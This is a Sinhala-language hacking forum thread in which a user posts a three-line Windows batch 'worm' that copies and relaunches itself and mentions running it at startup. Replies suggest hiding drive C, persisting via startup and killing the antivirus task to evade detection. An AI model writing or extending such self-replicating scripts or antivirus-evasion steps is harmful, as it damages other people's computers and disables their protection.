1. Guest ඔබ ශ්‍රී Mafia වෙත සාදරයෙන් පිලිගන්නවා.. අපත් සමග එකතු වී අලුත් දැනුම සොයා යන්න පෙළ ගැසෙන්න !!
    Dismiss Notice
Dismiss Notice
ආයුබෝවන් Guest ඔබ කැමතිද අපගේ Security Services එක සමග එකතු වී වැඩ කරන්න එසේනම් මෙතනින් එන්න

Worm කෙනෙක්ව notepad එකෙන් හදමු....

Discussion in 'White Hat Malware, Virus, and Rat Removal Help' started by Green_Wolf, Jan 9, 2017.

  1. Green_Wolf

    Green_Wolf New Member

    Joined:
    Dec 2, 2016
    Messages:
    15
    Likes Received:
    13
    හරි දැන් worm කියන්නෙ පණුවටනෙ...දැං උඹලා කල්පනා කරයි මොන මඟුලටද අපි පණුවෙක් හදන්නෙ කියල...:confused: මූ අහිංසක පණුවෙක් නෙවෙයි...මූ හෙන පවර්පුල් පණු තඩියෙක්...මූ ගැන ඉතිහාස කතාවකුත් තියේ:cool: මූ සෙල්ලං ඩෑල් එකක් නෙවෙයි දෙවෙනි අග්බෝ රජ සමයෙ හිටිය කැ*රියෙක්!:cool:
    Wikipedia › wiki › Computer_worm ඕක කියෝලා තේරුං ගනිංකො මූ කෝම එකෙක්ඩ කියල ඈ...

    ඕකේ බේබීස්...මෙන්න සුපුරුදු පරිදි code ටික..... ආ මේ code දෙන්න කලිං local disc C එකේ programs කියල folder එකක් හදන්නෝනෙ.

    Code:
    @echo off
    Copy C:\Programs\virus.bat C:\Programs
    Start C:\Programs\virus.bat
    ඕකෙ ඔය virus.bat කියන තැනට කැමති නමක් දාලා ඒ නමම save කරපං.save කරන්නෝනෙ අර හදපු folder එකටමයි.

    දැං ඔක්කොම හරි.ඕනෙ නම් මේක startup එකේදිම run කරන්නත් පුළුවං...:D පොඩි උන්ට ඒවා ඕන්නෑ ;)

    ඕල් රයිට්.
    තැංකූ ඕල්.
    ලව් යූ.
     
    #1
    Last edited by a moderator: Jan 10, 2017
  2. Elite_x

    Elite_x Moderator
    Staff Member

    Joined:
    Oct 11, 2016
    Messages:
    50
    Likes Received:
    31
    ta hike, thawa code 1k madata dapan bn, naththam oka wadak nathi wenawane.
     
    #2
    Shadow and Green_Wolf like this.
  3. Green_Wolf

    Green_Wolf New Member

    Joined:
    Dec 2, 2016
    Messages:
    15
    Likes Received:
    13
    ඕකෙන් වෙන්නෙ c එකේ එව්වා දිගටම copy වෙන එක
     
    #3
    Shadow likes this.
  4. Shadow

    Shadow Moderator
    Staff Member

    Joined:
    Dec 3, 2016
    Messages:
    44
    Likes Received:
    24
    මේ dew සහෝ නේද? :D එලයිට් ගේ නම ශ්‍රී මාෆියා එකෙත් පතුරවයි වගේ උබ o_O. මම tricks guide lk ඈ....
     
    #4
  5. Green_Wolf

    Green_Wolf New Member

    Joined:
    Dec 2, 2016
    Messages:
    15
    Likes Received:
    13
    Mn dannawa :D
     
    #5
  6. Shadow

    Shadow Moderator
    Staff Member

    Joined:
    Dec 3, 2016
    Messages:
    44
    Likes Received:
    24
    මන් profile pic එකේ දාලා තිබ්බ හින්දා නේ දන්නෙ...
    මන් උබගේ කලින් කොමෙන්ටුව එඩිට් කොලා.... නැත්නම් එලයිට් කාරයා ඉවරයි මේක අස්සේදි
     
    #6
    Green_Wolf likes this.
  7. Maniax

    Maniax Member

    Joined:
    Nov 13, 2016
    Messages:
    51
    Likes Received:
    24
    පට්ට යකොව් :D
     
    #7
    Green_Wolf likes this.
  8. Elite_x

    Elite_x Moderator
    Staff Member

    Joined:
    Oct 11, 2016
    Messages:
    50
    Likes Received:
    31
    eaka thamai yako, thawa code 2k, 3k dahan. C 1 okkoma hide karala, ibetama startup copy wenna hadahan.
     
    #8
    Green_Wolf and gtrk like this.
  9. gtrk

    gtrk Member

    Joined:
    Nov 6, 2016
    Messages:
    40
    Likes Received:
    17
    wayiras gard eka bayipass wenne na bn :'(
     
    #9
    Green_Wolf likes this.
  10. Elite_x

    Elite_x Moderator
    Staff Member

    Joined:
    Oct 11, 2016
    Messages:
    50
    Likes Received:
    31
    guard 1 bypass karanna one ne, puluwan nam podi jilmart 1k dala task 1 end kalanam hari. hebei hema guard 1tama code liyanna wenawa.
     
    #10
    Green_Wolf likes this.

Share This Page